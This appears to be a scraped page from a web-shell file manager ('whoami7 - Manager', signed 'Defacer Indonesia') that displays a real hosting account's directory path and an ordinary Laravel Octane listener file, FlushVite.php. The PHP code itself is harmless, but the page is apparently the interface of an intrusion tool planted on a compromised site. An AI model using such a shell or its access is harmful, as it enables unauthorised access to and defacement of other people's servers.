whoami7 - Manager
:
/
home
/
qbizpnmr
/
arif.umairtax.com
/
vendor
/
laravel
/
octane
/
src
/
Listeners
/
Upload File:
files >> /home/qbizpnmr/arif.umairtax.com/vendor/laravel/octane/src/Listeners/FlushVite.php
<?php namespace Laravel\Octane\Listeners; use Illuminate\Foundation\Vite; class FlushVite { /** * Handle the event. * * @param mixed $event * @return void */ public function handle($event) { if (! $event->sandbox->resolved(Vite::class)) { return; } $vite = $event->sandbox->make(Vite::class); if (method_exists($vite, 'flush')) { $vite->flush(); } } }
Copyright ©2021 || Defacer Indonesia